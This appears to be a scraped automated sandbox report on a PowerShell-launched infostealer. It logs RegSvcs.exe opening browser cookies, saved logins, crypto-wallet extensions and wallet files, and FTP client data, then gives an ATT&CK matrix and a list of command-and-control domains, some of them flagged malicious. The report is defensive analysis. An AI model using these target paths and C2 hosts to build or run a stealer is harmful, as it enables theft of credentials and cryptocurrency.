        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation
        1
        DLL Side-Loading
        211
        Process Injection
        121
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        111
        Security Software Discovery
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        211
        Process Injection
        LSASS Memory1
        Process Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Deobfuscate/Decode Files or Information
        Security Account Manager121
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares41
        Data from Local System
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object Model3
        Clipboard Data
        114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets12
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        176.113.115.170.ps17%VirustotalBrowse
        176.113.115.170.ps18%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://misha-lomonosov.com/0%Avira URL Cloudsafe
        https://misha-lomonosov.com/api_0%Avira URL Cloudsafe
        https://misha-lomonosov.com:443/api$o00%Avira URL Cloudsafe
        grandiouseziu.biz100%Avira URL Cloudmalware
        nuttyshopr.biz100%Avira URL Cloudmalware
        https://misha-lomonosov.com/apie0%Avira URL Cloudsafe
        spookycappy.biz100%Avira URL Cloudmalware
        https://misha-lomonosov.com/api0%Avira URL Cloudsafe
        https://littlenotii.biz:443/apizn100%Avira URL Cloudmalware
        truculengisau.biz100%Avira URL Cloudmalware
        littlenotii.biz100%Avira URL Cloudmalware
        https://misha-lomonosov.com/P7N0%Avira URL Cloudsafe
        https://community.fastly.steamstatic./0%Avira URL Cloudsafe
        http://www.valvesoftware.com/legal.hllY0%Avira URL Cloudsafe
        https://misha-lomonosov.com/l0%Avira URL Cloudsafe
        https://misha-lomonosov.com/buAB0%Avira URL Cloudsafe
        marketlumpe.biz100%Avira URL Cloudmalware
        https://misha-lomonosov.com:443/api0%Avira URL Cloudsafe
        fraggielek.biz100%Avira URL Cloudmalware
        punishzement.biz100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        steamcommunity.com
        104.102.49.254
        truefalse
          high
          misha-lomonosov.com
          172.67.160.193
          truetrue
            unknown
            littlenotii.biz
            unknown
            unknowntrue
              unknown
              fraggielek.biz
              unknown
              unknowntrue
                unknown
                nuttyshopr.biz
                unknown
                unknowntrue
                  unknown
                  grandiouseziu.biz
                  unknown
                  unknowntrue
                    unknown
                    marketlumpe.biz
                    unknown
                    unknowntrue
                      unknown
                      spookycappy.biz
                      unknown
                      unknowntrue
                        unknown
                        truculengisau.biz
                        unknown
                        unknowntrue
                          unknown
                          punishzement.biz
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            grandiouseziu.biztrue
                            • Avira URL Cloud: malware
                            unknown
                            spookycappy.biztrue
                            • Avira URL Cloud: malware
                            unknown
                            truculengisau.biztrue
                            • Avira URL Cloud: malware
                            unknown
                            https://misha-lomonosov.com/apitrue
                            • Avira URL Cloud: safe
                            unknown
                            https://steamcommunity.com/profiles/76561199724331900false
                              high
                              nuttyshopr.biztrue
                              • Avira URL Cloud: malware
                              unknown
                              marketlumpe.biztrue
                              • Avira URL Cloud: malware
                              unknown
                              littlenotii.biztrue
                              • Avira URL Cloud: malware
                              unknown
                              fraggielek.biztrue
                              • Avira URL Cloud: malware
                              unknown
                              punishzement.biztrue
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://misha-lomonosov.com:443/api$o0RegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://store.steampowered.com/subscriber_agreement/RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://misha-lomonosov.com/api_RegSvcs.exe, 00000002.00000002.1828060678.000000000153C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://misha-lomonosov.com/apieRegSvcs.exe, 00000002.00000002.1828060678.000000000153C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://littlenotii.biz:443/apiznRegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://contoso.com/powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1694727177.0000022417DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://oneget.orgXpowershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1694727177.00000224162C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
